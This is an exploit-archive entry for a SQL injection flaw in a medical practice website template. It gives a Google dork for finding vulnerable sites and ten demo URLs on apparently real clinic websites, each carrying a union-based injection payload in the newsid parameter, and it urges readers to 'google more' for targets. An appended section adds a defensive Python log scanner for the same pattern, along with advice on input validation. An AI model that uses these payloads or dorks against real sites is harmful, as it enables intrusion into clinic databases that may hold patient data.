Medical Website Design SQL Injection Vulnerability

2015-07-26T00:00:00
ID 1337DAY-ID-23932
Type zdt
Reporter Ashiyane
Modified 2015-07-26T00:00:00

Description

Exploit for the PHP platform, in the web applications category.

                                        
######################
# Exploit Title : Medical Website Design SQL Injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.medicalpracticewebsitedesign.com/
# Google Dork : "Medical Practice Website Design" inurl:.php?newsid=
# Date: 2015-07-24
# Tested On : Win 7 / Mozilla Firefox
#
######################
#
# demos and explanations :
#
# http://www.georgXiavascularclinic.com/news-topic.php?newsid=-25%20%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.arundXelpediatrics.net/news-topic.php?newsid=-28%20%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.monXtgomerywomenshealth.com/news-topic.php?newsid=-25%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.ovieXdointernalmedicine.com/news-topic.php?newsid=-29%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://personalizXedcardiology.com/news-topic.php?newsid=-27%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.norXthatlantaprimarycare.com/news-topic.php?newsid=-84%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
# http://www.medXassocga.com/news-topic.php?newsid=-31%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.sd-Xneurosurgeon.com/news-topic.php?newsid=-16%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
# http://www.sspXinst.us/news-topic.php?newsid=-25%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.nmmeXdicalgroup.com/news-topic.php?newsid=-13%[email protected]:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
#
# and google more
#
######################
# discovered by : Naji
######################
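
An added example, not part of the original advisory: a log check that flags the request shape shown in the demos above, where `newsid` on `news-topic.php` carries anything other than a plain integer, including keywords wrapped in MySQL versioned comments such as `/*!00000union*/`. The sample request lines are constructed, and the function names (`classify`, `scan`) are assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request lines (not real traffic).
SAMPLE_LOG = [
    'GET /news-topic.php?newsid=25 HTTP/1.1',
    'GET /news-topic.php?newsid=-25%20/*!00000union*/+SELECT+1,2,3,4,5,6,7-- HTTP/1.1',
    'GET /news-topic.php?newsid=12%20UnIoN%0aSeLeCt%201 HTTP/1.1',
    'GET /news-topic.php?newsid=abc HTTP/1.1',
    'GET /contact.php?name=union+station HTTP/1.1',
]

VERSIONED_COMMENT = re.compile(r'/\*!\d*')   # MySQL executable comment opener
SQL_KEYWORDS = re.compile(r'\b(union|select)\b', re.I)

def classify(request_line, param='newsid', script='news-topic.php'):
    """Return None for benign or unrelated requests, else a list of reasons."""
    try:
        _method, target, _proto = request_line.split(' ', 2)
    except ValueError:
        return ['malformed request line']
    url = urlsplit(target)
    if not url.path.endswith('/' + script):
        return None
    # parse_qs percent-decodes the value and turns '+' into a space
    values = parse_qs(url.query, keep_blank_values=True).get(param, [])
    reasons = []
    for value in values:
        if re.fullmatch(r'\d{1,10}', value):
            continue  # the only shape a numeric article id should have
        reasons.append('non-integer id')
        if VERSIONED_COMMENT.search(value):
            reasons.append('versioned comment')
        # Strip comment wrappers so /*!00000union*/ is matched as "union"
        plain = re.sub(r'/\*!?\d*|\*/', ' ', value)
        if SQL_KEYWORDS.search(plain):
            reasons.append('sql keyword')
    return reasons or None

def scan(lines):
    """Map line index -> reasons for every flagged request line."""
    return {i: r for i, line in enumerate(lines) if (r := classify(line))}

if __name__ == '__main__':
    for index, reasons in scan(SAMPLE_LOG).items():
        print(index, reasons)
```

The same integer-only rule, enforced in the application before `newsid` is bound into a parameterized query, removes the injection itself rather than only detecting it.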

#  0day.today [2018-01-01]  #